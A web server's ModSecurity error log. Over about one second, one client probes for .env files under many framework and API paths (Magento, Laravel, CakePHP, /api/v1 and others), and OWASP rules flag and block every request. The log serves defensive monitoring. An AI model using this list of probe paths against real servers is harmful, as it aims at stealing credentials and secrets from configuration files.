[Mon May 11 15:50:10.644803 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agHekqy-5-wpj6Sx56aivwAAABc"]
[Mon May 11 15:50:10.645289 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agHekqy-5-wpj6Sx56aivwAAABc"]
[Mon May 11 15:50:10.645511 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agHekqy-5-wpj6Sx56aivwAAABc"]
[Mon May 11 15:50:10.739293 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwAAAABc"]
[Mon May 11 15:50:10.739704 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwAAAABc"]
[Mon May 11 15:50:10.739894 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwAAAABc"]
[Mon May 11 15:50:10.835766 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwQAAABc"]
[Mon May 11 15:50:10.836207 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwQAAABc"]
[Mon May 11 15:50:10.836413 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwQAAABc"]
[Mon May 11 15:50:10.931611 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwgAAABc"]
[Mon May 11 15:50:10.932096 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwgAAABc"]
[Mon May 11 15:50:10.932340 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agHekqy-5-wpj6Sx56aiwgAAABc"]
[Mon May 11 15:50:11.026125 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agHek6y-5-wpj6Sx56aiwwAAABc"]
[Mon May 11 15:50:11.026616 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agHek6y-5-wpj6Sx56aiwwAAABc"]
[Mon May 11 15:50:11.026826 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agHek6y-5-wpj6Sx56aiwwAAABc"]
[Mon May 11 15:50:11.123915 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agHek6y-5-wpj6Sx56aixAAAABc"]
[Mon May 11 15:50:11.124423 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agHek6y-5-wpj6Sx56aixAAAABc"]
[Mon May 11 15:50:11.124646 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agHek6y-5-wpj6Sx56aixAAAABc"]
[Mon May 11 15:50:11.218625 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agHek6y-5-wpj6Sx56aixgAAABc"]
[Mon May 11 15:50:11.219058 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agHek6y-5-wpj6Sx56aixgAAABc"]
[Mon May 11 15:50:11.219286 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agHek6y-5-wpj6Sx56aixgAAABc"]
[Mon May 11 15:50:11.313222 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agHek6y-5-wpj6Sx56aixwAAABc"]
[Mon May 11 15:50:11.313701 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agHek6y-5-wpj6Sx56aixwAAABc"]
[Mon May 11 15:50:11.313909 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agHek6y-5-wpj6Sx56aixwAAABc"]
[Mon May 11 15:50:11.408010 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agHek6y-5-wpj6Sx56aiyAAAABc"]
[Mon May 11 15:50:11.408494 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agHek6y-5-wpj6Sx56aiyAAAABc"]
[Mon May 11 15:50:11.408698 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agHek6y-5-wpj6Sx56aiyAAAABc"]
[Mon May 11 15:50:11.502798 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agHek6y-5-wpj6Sx56aiygAAABc"]
[Mon May 11 15:50:11.503282 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agHek6y-5-wpj6Sx56aiygAAABc"]
[Mon May 11 15:50:11.503567 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agHek6y-5-wpj6Sx56aiygAAABc"]
[Mon May 11 15:50:11.598098 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agHek6y-5-wpj6Sx56aiywAAABc"]
[Mon May 11 15:50:11.598624 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agHek6y-5-wpj6Sx56aiywAAABc"]
[Mon May 11 15:50:11.598856 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agHek6y-5-wpj6Sx56aiywAAABc"]
[Mon May 11 15:50:11.696791 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agHek6y-5-wpj6Sx56aizAAAABc"]
[Mon May 11 15:50:11.697231 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agHek6y-5-wpj6Sx56aizAAAABc"]
[Mon May 11 15:50:11.697445 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agHek6y-5-wpj6Sx56aizAAAABc"]
[Mon May 11 15:50:11.791267 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agHek6y-5-wpj6Sx56aizQAAABc"]
[Mon May 11 15:50:11.791693 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agHek6y-5-wpj6Sx56aizQAAABc"]
[Mon May 11 15:50:11.791919 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agHek6y-5-wpj6Sx56aizQAAABc"]
